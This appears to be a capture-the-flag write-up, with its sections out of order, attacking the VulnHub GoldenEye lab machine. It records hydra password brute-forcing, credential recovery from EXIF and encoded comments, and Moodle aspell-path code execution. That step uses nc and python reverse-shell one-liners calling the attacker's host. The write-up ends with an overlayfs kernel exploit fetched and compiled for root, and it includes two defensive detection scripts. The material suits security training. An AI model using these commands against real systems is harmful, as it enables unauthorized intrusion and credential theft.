The intro to Goldeneye link takes me to a login page:
The xenia credentials work!
There's a message for Xenia from Dr. Doak. Let's check that out.
Greetings Xenia,
As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.
My email username is...
doak
Thank you,
Cheers,
Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@
Please Recycle before you print, Stay Green aka save the company money!
"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.
THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS.
Ok, another username. doak.
I don't have creds, but perhaps I should try adding doak and even the user 'admin' to another hydra attack.
I'll put them into another users file:
root@kali:~/Documents/vulnhub/goldeneye# echo "doak" > goldeneye-users2.txt
root@kali:~/Documents/vulnhub/goldeneye# echo "admin" >> goldeneye-users2.txt
I look around the site. There's nothing in terms of courses/blogs or any other info/intel of use.
Based on the message above, perhaps confirming the xenia account will open up some possibilities?
Kick off another hydra...
root@kali:~/Documents/vulnhub/goldeneye# hydra -L goldeneye-users2.txt -P /usr/share/wordlists/fasttrack.txt -s 55007 192.168.111.128 pop3
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-08-16 22:27:09
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 16 tasks, 444 login tries (l:2/p:222), ~28 tries per task
[DATA] attacking pop3://192.168.111.128:55007/
[STATUS] 80.00 tries/min, 80 tries in 00:01h, 364 to do in 00:05h, 16 active
[55007][pop3] host: 192.168.111.128 login: doak password: goat
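Hydra at 80 tries a minute against Dovecot is loud on the server side. As an added example (not part of the walkthrough), this parses constructed log lines in Dovecot's pop3-login format and flags both the burst of failed logins from one source and the login that then succeeds from it; the threshold, window and the 2018 year are my assumptions.

```python
"""Added example (not part of the walkthrough): detect the POP3 password
spray from the hydra run above in Dovecot-style logs, plus the login that
succeeds from the same source afterwards."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in Dovecot's pop3-login log format. Syslog timestamps
# carry no year, so the year is passed in; 2018 matches the walkthrough.
SAMPLE_LOG = """\
Aug 16 22:27:10 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<doak>, method=PLAIN, rip=192.168.111.129, lip=192.168.111.128, session=<a1>
Aug 16 22:27:11 ubuntu dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 4 secs): user=<admin>, method=PLAIN, rip=192.168.111.129, lip=192.168.111.128, session=<a2>
Aug 16 22:27:12 ubuntu dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 4 secs): user=<doak>, method=PLAIN, rip=192.168.111.129, lip=192.168.111.128, session=<a3>
Aug 16 22:27:14 ubuntu dovecot: pop3-login: Disconnected (auth failed, 3 attempts in 3 secs): user=<admin>, method=PLAIN, rip=192.168.111.129, lip=192.168.111.128, session=<a4>
Aug 16 22:27:30 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 9 secs): user=<boris>, method=PLAIN, rip=192.168.111.50, lip=192.168.111.128, session=<b1>
Aug 16 22:32:40 ubuntu dovecot: pop3-login: Login: user=<doak>, method=PLAIN, rip=192.168.111.129, lip=192.168.111.128, mpid=3121, session=<a5>
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) \S+ dovecot: pop3-login: "
    r"(?:(?P<login>Login)|Disconnected \(auth failed, (?P<n>\d+) attempts? in \d+ secs\))"
    r": user=<(?P<user>[^>]*)>, method=\w+, rip=(?P<rip>[0-9.]+)"
)


def parse_line(line, year=2018):
    """One log line -> event dict, or None for lines we do not care about."""
    m = LINE_RE.match(line)
    if not m:
        return None
    return {
        "ts": datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S"),
        "login": m["login"] is not None,
        "failures": int(m["n"] or 0),   # Dovecot sums attempts per connection
        "user": m["user"],
        "rip": m["rip"],                 # remote IP of the client
    }


def analyse(log_text, threshold=10, window=timedelta(seconds=60), year=2018):
    """Return alerts: 'bruteforce' when one source accumulates >= threshold
    failed attempts inside the sliding window, and 'login_after_spray' when
    a source with >= threshold earlier failures finally logs in."""
    alerts = []
    recent = defaultdict(deque)        # rip -> (ts, failures) inside the window
    seen_failures = defaultdict(int)   # rip -> failures since start of log
    already_flagged = set()
    for line in log_text.splitlines():
        ev = parse_line(line, year)
        if ev is None:
            continue
        rip = ev["rip"]
        if ev["login"]:
            if seen_failures[rip] >= threshold:
                alerts.append({"type": "login_after_spray", "rip": rip,
                               "user": ev["user"], "at": ev["ts"],
                               "prior_failures": seen_failures[rip]})
            continue
        seen_failures[rip] += ev["failures"]
        q = recent[rip]
        q.append((ev["ts"], ev["failures"]))
        while q and ev["ts"] - q[0][0] > window:
            q.popleft()                    # drop failures outside the window
        in_window = sum(n for _, n in q)
        if in_window >= threshold and rip not in already_flagged:
            already_flagged.add(rip)       # one alert per source, not per line
            alerts.append({"type": "bruteforce", "rip": rip,
                           "failures": in_window, "from": q[0][0], "to": ev["ts"]})
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```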
Oh wow... that worked. Let's see if there's anything interesting in doak's mail...
root@kali:~/Documents/vulnhub/goldeneye# nc 192.168.111.128 55007
+OK GoldenEye POP3 Electronic-Mail System
user doak
+OK
pass goat
+OK Logged in.
list
+OK 1 messages:
1 606
.
retr 1
+OK 606 octets
Return-Path: <doak@ubuntu>
X-Original-To: doak
Delivered-To: doak@ubuntu
Received: from doak (localhost [127.0.0.1])
by ubuntu (Postfix) with SMTP id 97DC24549D
for <doak>; Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
Message-Id: <20180425034731.97DC24549D@ubuntu>
Date: Tue, 30 Apr 1995 20:47:24 -0700 (PDT)
From: doak@ubuntu
James,
If you're reading this, congrats you've gotten this far. You know how tradecraft works right?
Because I don't. Go to our training site and login to my account....dig until you can exfiltrate further information......
username: dr_doak
password: 4England!
.
quit
+OK Logging out.
root@kali:~/Documents/vulnhub/goldeneye#
Sure enough, we have more creds! Let's try and login to the moodle site using these creds.
We're in!
So looking around the site, couldn't find anything, then I came across a folder called 'for james' which contained a s3cret.txt file.
It's contents:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
So I navigate to that url:
Haha nice. But what do we have here? Perhaps 486 is something? Or maybe the jpeg has some embedded info? Let's see...
Download it:
root@kali:~/Documents/vulnhub/goldeneye# wget http://severnaya-station.com//dir007key/for-007.jpg
--2018-08-16 22:37:28-- http://severnaya-station.com//dir007key/for-007.jpg
Resolving severnaya-station.com (severnaya-station.com)... 192.168.111.128
Connecting to severnaya-station.com (severnaya-station.com)|192.168.111.128|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 14896 (15K) [image/jpeg]
Saving to: ‘for-007.jpg’
for-007.jpg 100%[===================================================================================================================================================>] 14.55K --.-KB/s in 0s
2018-08-16 22:37:28 (218 MB/s) - ‘for-007.jpg’ saved [14896/14896]
root@kali:~/Documents/vulnhub/goldeneye# exif for-007.jpg
EXIF tags in 'for-007.jpg' ('Motorola' byte order):
--------------------+----------------------------------------------------------
Tag |Value
--------------------+----------------------------------------------------------
Image Description |eFdpbnRlcjE5OTV4IQ==
Manufacturer |GoldenEye
Resolution Unit |Inch
Software |linux
Artist |For James
YCbCr Positioning |Centered
X-Resolution |72
Y-Resolution |72
Exif Version |Unknown Exif Version
Components Configura|Y Cb Cr -
User Comment |For 007
FlashPixVersion |FlashPix Version 1.0
Color Space |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
Hmmm that image description looks suss! Let's base64 decode it...
root@kali:~/Documents/vulnhub/goldeneye# echo eFdpbnRlcjE5OTV4IQ== | base64 --decode
xWinter1995x!
root@kali:~/Documents/vulnhub/goldeneye#
OK, now that looks like creds to me...
Maybe for the admin user? My hydra completed without finding anything for the admin user. But let's try the admin user with these new creds...
Winner winner
There's a bit to look at with admin settings, but I come across a system paths setting, where you can set a path to aspell, du and dot. Looks like you can enter system paths! Googling around, this looks like a known vector of attack for code execution.
I start a listener:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
And I try updating the aspellpath to perform a reverse shell (hoping nc is installed).
sh -c '(nc 192.168.253.130 443 -e /bin/sh &)'
I create a blog post and run spellchecker. Hmm nothing...
Digging further in the settings, looks like the spellchecker is defaulted to use google, rather than a custom spell checker program, as we configured.
Now let's change this to PSpellShell.
So I spent hours, trying all sorts of reverse shell combos with no success. I went through my usual go to list below:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
https://highon.coffee/blog/reverse-shell-cheat-sheet/
Nothing was working. I later realised my goldeneye vm was configured to use host-only networking and my Kali machine was using a NAT adapter.
This meant I could use my host's physical adapter to access the internet and also reach the goldeneye vm. However, there was no route back for my reverse shell to connect to.
I changed my Kali machine to a host only adapter, on the same subnet as goldeneye.
My new kali IP is now 192.168.111.129.
Update the aspellshell path:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.129",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Hit spell check on a nonsense new blog:
root@kali:~/Documents/vulnhub/goldeneye# nc -lvp 443
listening on [any] 443 ...
connect to [192.168.111.129] from severnaya-station.com [192.168.111.128] 48560
/bin/sh: 0: can't access tty; job control turned off
$
BINGO!
--> TIME TO PE
Change over to a python tty shell and see what we're working with...
$ python -c 'import pty;pty.spawn("/bin/bash")'
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$
<ditor/tinymce/tiny_mce/3.4.9/plugins/spellchecker$ cd /
cd /
www-data@ubuntu:/$ hostname
hostname
ubuntu
www-data@ubuntu:/$ uname -ra
uname -ra
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/$ cat /etc/*release
cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.1 LTS"
NAME="Ubuntu"
VERSION="14.04.1 LTS, Trusty Tahr"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 14.04.1 LTS"
VERSION_ID="14.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
www-data@ubuntu:/$ ifconfig
ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:2e:e5:d4
inet addr:192.168.111.128 Bcast:192.168.111.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe2e:e5d4/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:323 errors:0 dropped:0 overruns:0 frame:0
TX packets:679 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:52359 (52.3 KB) TX bytes:1058811 (1.0 MB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10760 errors:0 dropped:0 overruns:0 frame:0
TX packets:10760 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6139626 (6.1 MB) TX bytes:6139626 (6.1 MB)
www-data@ubuntu:/$
So Ubuntu 14.04.1 running Linux Kernel 3.13.0-32 64 bit....
I check out the directories in which the site is being hosted.
Looks like I found a new page:
www-data@ubuntu:/var/www/html$ ls -l
ls -l
total 264
drwxr-xr-x 3 www-data www-data 4096 Apr 25 07:29 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
www-data@ubuntu:/var/www/html$ dir 006-final
dir 006-final
sata_drop.webm sata_drop.webm.1 x8vtfinal-flag.gif xvf7-flag
www-data@ubuntu:/var/www/html$
Let's check them in firefox:
Hahaha nice:
Quick look around I don't see anything exciting to move me forward....
What else do we have?
www-data@ubuntu:/var/www/html$ ls -la
ls -la
total 272
drwxr-xr-x 6 root root 4096 Apr 29 10:18 .
drwxr-xr-x 4 root root 4096 Apr 23 20:56 ..
drwxr-xr-x 3 www-data www-data 4096 Aug 16 20:53 006-final
drwxr-xr-x 2 www-data www-data 4096 Apr 25 07:29 dir007key
drwxr-xr-x 41 www-data www-data 4096 Apr 25 07:27 gnocertdir
-rwxr--r-- 1 www-data www-data 354 Apr 24 17:49 index.css
-rw-r--r-- 1 www-data www-data 252 Apr 25 23:29 index.html
-rw-r--r-- 1 www-data www-data 39748 Apr 24 15:58 logo.png
-rw-r--r-- 1 www-data www-data 4 Apr 25 07:37 rtm.log
drwxr-xr-x 2 www-data www-data 4096 Apr 24 19:34 sev-home
-rw-r--r-- 1 www-data www-data 184883 Apr 25 07:47 sniper.png
-rw-r--r-- 1 www-data www-data 2301 Apr 29 09:33 space.gif
-rw-r--r-- 1 www-data www-data 1414 Apr 29 10:18 splashAdmin.php
-rw-r--r-- 1 www-data www-data 1349 Apr 24 17:56 terminal.js
Looking at the root I find sniper.jpg...
Ahhh makes me wanna play Goldeneye...
Let's check the exif data on this one...
Nah nothing...
So I check out splashAdmin.php:
Hard to read, but the line that sounds most interesting is: "For programming I highly prefer the Alternative to GCC, which FreeBSD uses. It's more verbose when compiling, throwing warnings and such - this can easily be turned off with a proper flag. I've replaced GCC with this throughout the GolenEye systems. "
I'll keep that in mind. I keep looking through the file system, especially under /var/www, and find some files uploaded through Moodle:
-rw-rw-rw- 1 www-data www-data 168 Apr 23 21:16 warning.txt
./05:
total 4
drwxrwsrwx 2 www-data www-data 4096 Aug 15 19:46 6d
./05/6d:
total 8
-rw-rw-rw- 1 www-data www-data 4795 Aug 15 19:46 056d495e4768cf97825602ed6a1096eab6d67a5a
./82:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 34
./82/34:
total 1496
-rw-rw-rw- 1 www-data www-data 1529575 Apr 24 16:10 82341a17005e75a8f4614ea435acbc3148cf30ea
./a6:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:15 f9
./a6/f9:
total 4
-rw-rw-rw- 1 www-data www-data 3242 Apr 24 16:15 a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
./ad:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 18:28 5c
./ad/5c:
total 4
-rw-rw-rw- 1 www-data www-data 364 Apr 24 18:28 ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
./da:
total 4
drwxrwsrwx 2 www-data www-data 4096 Apr 24 16:10 39
./da/39:
total 0
-rw-rw-rw- 1 www-data www-data 0 Apr 24 16:10 da39a3ee5e6b4b0d3255bfef95601890afd80709
www-data@ubuntu:/var/www/moodledata/filedir$
The first one is an attempted PHP Moodle exploit I tried previously.
www-data@ubuntu:/var/www/moodledata/filedir/05/6d$ file 82341a17005e75a8f4614ea435acbc3148cf30ea BORIS GIF
82341a17005e75a8f4614ea435acbc3148cf30ea: GIF image data, version 89a, 500 x 278
www-data@ubuntu:/var/www/moodledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d NATALYA GIF
<odledata/filedir/a6/f9$ file a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d
a6f9eb0b8ac65934fb6adc15766fb2fa70e1873d: JPEG image data, JFIF standard 1.01
www-data@ubuntu:/var/www/moodledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
<odledata/filedir/ad/5c$ file ad5c3bc9ae900b39509eb2d6a727455e39d77b9b
ad5c3bc9ae900b39509eb2d6a727455e39d77b9b: ASCII text, with CRLF line terminators
^Just contained this text message:
007,
I was able to capture this apps adm1n cr3ds through clear txt.
Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.
Something juicy is located here: /dir007key/for-007.jpg
Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
The last one is empty:
www-data@ubuntu:/var/www/moodledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
<odledata/filedir/da/39$ file da39a3ee5e6b4b0d3255bfef95601890afd80709
da39a3ee5e6b4b0d3255bfef95601890afd80709: empty
Nothing fun here...
Going back to the Linux version, let's check what kernel exploits are available for 3.13.0:
root@kali:~/Documents/vulnhub/goldeneye# searchsploit Linux Kernel 3.13.0
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | exploits/linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/shadow) | exploits/linux/local/37293.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Hmm, let's have a look... I've used this one before. However, it relies on gcc for compiling.
Based on the message I read earlier, quick google: "freebsd gcc equivalent clang"
https://unix.stackexchange.com/questions/49906/why-is-freebsd-deprecating-gcc-in-favor-of-clang-llvm
After briefly reading, it seems clang is a compatible compiler... Hmm, let's try this!
Host it on my kali machine:
root@kali:~/Documents/vulnhub/goldeneye# cp /usr/share/exploitdb/exploits/linux/local/37292.c .
root@kali:~/Documents/vulnhub/goldeneye# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
Download and compile:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292.c
wget http://192.168.111.129/37292.c
--2018-08-19 02:52:53-- http://192.168.111.129/37292.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
Saving to: '37292.c'
100%[======================================>] 5,119 --.-K/s in 0s
2018-08-19 02:52:53 (1013 MB/s) - '37292.c' saved [5119/5119]
www-data@ubuntu:/tmp$ which cc
which cc
/usr/bin/cc
www-data@ubuntu:/tmp$ which clang
which clang
/usr/bin/clang
www-data@ubuntu:/tmp$ clang 37292.c -o a
clang 37292.c -o a
37292.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls
ls
37292.c a vmware-root
www-data@ubuntu:/tmp$
Hmmm that looked easy?
Lets see?
www-data@ubuntu:/tmp$ ./a
./a
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
sh: 1: gcc: not found
couldn't create dynamic library
www-data@ubuntu:/tmp$
Hmm gcc not found? Let's check the exploit code...
Line 143:
lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w");
I edit this and replace gcc with clang.
Let's download the edited copy now:
www-data@ubuntu:/tmp$ wget http://192.168.111.129/37292_edited.c
wget http://192.168.111.129/37292_edited.c
--2018-08-19 02:58:49-- http://192.168.111.129/37292_edited.c
Connecting to 192.168.111.129:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5123 (5.0K) [text/plain]
Saving to: '37292_edited.c'
100%[======================================>] 5,123 --.-K/s in 0s
2018-08-19 02:58:49 (10.9 MB/s) - '37292_edited.c' saved [5123/5123]
Compile again:
www-data@ubuntu:/tmp$ clang 37292_edited.c -o b
clang 37292_edited.c -o b
37292_edited.c:94:1: warning: control may reach end of non-void function [-Wreturn-type]
}
^
37292_edited.c:106:12: warning: implicit declaration of function 'unshare' is invalid in C99 [-Wimplicit-function-declaration]
if(unshare(CLONE_NEWUSER) != 0)
^
37292_edited.c:111:17: warning: implicit declaration of function 'clone' is invalid in C99 [-Wimplicit-function-declaration]
clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
^
37292_edited.c:117:13: warning: implicit declaration of function 'waitpid' is invalid in C99 [-Wimplicit-function-declaration]
waitpid(pid, &status, 0);
^
37292_edited.c:127:5: warning: implicit declaration of function 'wait' is invalid in C99 [-Wimplicit-function-declaration]
wait(NULL);
^
5 warnings generated.
www-data@ubuntu:/tmp$ ls -l
ls -l
total 76
-rw-rw-rw- 1 www-data www-data 5119 Aug 19 02:47 37292.c
-rw-rw-rw- 1 www-data www-data 5123 Aug 19 02:58 37292_edited.c
-rwxrwxrwx 1 www-data www-data 13773 Aug 19 02:53 a
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:58 a.out
-rwxrwxrwx 1 www-data www-data 13780 Aug 19 02:59 b
drwxrwxrwx 5 www-data www-data 4096 Aug 19 02:54 ns_sploit
-rwxrwxrwx 1 www-data www-data 418 Aug 19 02:54 ofs-lib.c
drwx------ 2 root root 4096 Aug 19 01:19 vmware-root
Let's see what happens now:
www-data@ubuntu:/tmp$ ./b
./b
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
whoami
root
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
#
FINALLY! YES!!!!!
Now for the flag:
# cd /root
cd /root
# ls -la
ls -la
total 44
drwx------ 3 root root 4096 Apr 29 19:28 .
drwxr-xr-x 22 root root 4096 Apr 24 21:57 ..
-rw-r--r-- 1 root root 19 May 3 10:08 .bash_history
-rw-r--r-- 1 root root 3106 Feb 19 2014 .bashrc
drwx------ 2 root root 4096 Apr 28 11:00 .cache
-rw------- 1 root root 144 Apr 29 19:16 .flag.txt
-rw-r--r-- 1 root root 140 Feb 19 2014 .profile
-rw------- 1 root root 1024 Apr 23 20:23 .rnd
-rw------- 1 root root 8296 Apr 29 10:18 .viminfo
# cat .flag.txt
cat .flag.txt
Alec told me to place the codes here:
568628e0d993b1973adc718237da6e93
If you captured this make sure to go here.....
/006-final/xvf7-flag/
Another one down.
I'm going to have to see how much a N64 goes for on eBay now!
--> n33dle
This one was fun. Some of the initial recon was more puzzle than real-world, but still enjoyable.
Initial compromise was via an exploit in the Moodle web application, then escalated to root through the infamous overlayfs Ubuntu/Linux Kernel exploit.
You can grab this vulnhub machine from here:
https://www.vulnhub.com/entry/goldeneye-1,240/
--> MISSION
The goal is to get root and capture the secret GoldenEye codes - flag.txt.
My target machine IP address is 192.168.111.128
--> REC0N / ENUMERATION
Let's start off with a full port scan:
root@kali:~# nmap -n -v -p- -T4 -sS 192.168.111.128
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-14 06:10 EDT
Initiating ARP Ping Scan at 06:10
Scanning 192.168.111.128 [1 port]
Completed ARP Ping Scan at 06:10, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 06:10
Scanning 192.168.111.128 [65535 ports]
Discovered open port 80/tcp on 192.168.111.128
Discovered open port 25/tcp on 192.168.111.128
Discovered open port 55007/tcp on 192.168.111.128
Discovered open port 55006/tcp on 192.168.111.128
Completed SYN Stealth Scan at 06:10, 1.69s elapsed (65535 total ports)
Nmap scan report for 192.168.111.128
Host is up (0.00081s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
25/tcp open smtp
80/tcp open http
55006/tcp open unknown
55007/tcp open unknown
And a udp scan using udp-proto-scanner:
root@kali:~# udp-proto-scanner.pl 192.168.111.128
Starting udp-proto-scanner v1.1 ( http://labs.portcullis.co.uk/application/udp-proto-scanner ) on Tue Aug 14 06:13:07 2018
================================================================================
Bandwith: .................... 250k bits/second
Max Probes per host: ......... 3
Config file: ................. /usr/local/bin/udp-proto-scanner.conf
Probes names: ................ DNSStatusRequest,DNSVersionBindReq,NBTStat,NTPRequest,RPCCheck,SNMPv3GetRequest,chargen,citrix,daytime,db2,echo,gtpv1,ike,ms-sql,ms-sql-slam,netop,ntp,rpc,snmp-public,systat,tftp,time,xdmcp
================================================================================
Sending DNSStatusRequest probes to 1 hosts...
Sending DNSVersionBindReq probes to 1 hosts...
Sending NBTStat probes to 1 hosts...
Sending NTPRequest probes to 1 hosts...
Sending RPCCheck probes to 1 hosts...
Sending SNMPv3GetRequest probes to 1 hosts...
Sending chargen probes to 1 hosts...
Sending citrix probes to 1 hosts...
Sending daytime probes to 1 hosts...
Sending db2 probes to 1 hosts...
Sending echo probes to 1 hosts...
Sending gtpv1 probes to 1 hosts...
Sending ike probes to 1 hosts...
Sending ms-sql probes to 1 hosts...
Sending ms-sql-slam probes to 1 hosts...
Sending netop probes to 1 hosts...
Sending ntp probes to 1 hosts...
Sending rpc probes to 1 hosts...
Sending snmp-public probes to 1 hosts...
Sending systat probes to 1 hosts...
Sending tftp probes to 1 hosts...
Sending time probes to 1 hosts...
Sending xdmcp probes to 1 hosts...
Scan complete at Tue Aug 14 06:13:59 2018
I've got tcp/80, tcp/25, tcp/55006 and tcp/55007 to work with.
Let's check out the web page:
A cool little console animation plays. I check the source, and the JavaScript that's running is terminal.js.
This holds something interesting in its source!
var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;
  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'> </span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}
Whatever this is, it's encoded:
InvincibleHack3r
Through Google I find it's HTML encoded. I run it through a decoding site, which gives me:
InvincibleHack3r
Most likely creds!
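The value in terminal.js was hidden only by HTML numeric character references, which every browser decodes on sight. As an added example (not code from the original post), here is a small Python check a reviewer can run over served JavaScript to flag and decode runs of such references; the sample source and the encode helper are constructed here, using the decoded value already shown above.

```python
import re

# One numeric character reference: decimal (&#73;) or hex (&#x49;).
_NUMREF = re.compile(r"&#([xX][0-9A-Fa-f]+|[0-9]+);")


def decode_numeric_refs(s: str) -> str:
    """Decode every &#NN; / &#xHH; reference in s; other text is left as-is."""
    def repl(m):
        ref = m.group(1)
        code = int(ref[1:], 16) if ref[0] in "xX" else int(ref, 10)
        return chr(code)
    return _NUMREF.sub(repl, s)


def encode_numeric_refs(s: str) -> str:
    """Decimal-reference encode every character (the way the comment hid its value)."""
    return "".join("&#%d;" % ord(c) for c in s)


def find_encoded_runs(source: str, min_refs: int = 4):
    """Return (line_number, decoded_text) for each run of at least min_refs
    consecutive numeric references in a JS/HTML source file. Single references
    such as &#39; in ordinary strings are ignored."""
    run_re = re.compile(r"(?:&#(?:[xX][0-9A-Fa-f]+|[0-9]+);){%d,}" % min_refs)
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in run_re.finditer(line):
            hits.append((lineno, decode_numeric_refs(m.group(0))))
    return hits


# Constructed sample in the shape of the terminal.js comment block above.
SAMPLE_JS = (
    "// Boris, make sure you update your default password.\n"
    "// I encoded you p@ssword below...\n"
    "// " + encode_numeric_refs("InvincibleHack3r") + "\n"
    "var x = 'it&#39;s fine';  // a lone &#39; is not flagged\n"
)

if __name__ == "__main__":
    for lineno, text in find_encoded_runs(SAMPLE_JS):
        print("line %d: %s" % (lineno, text))
```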
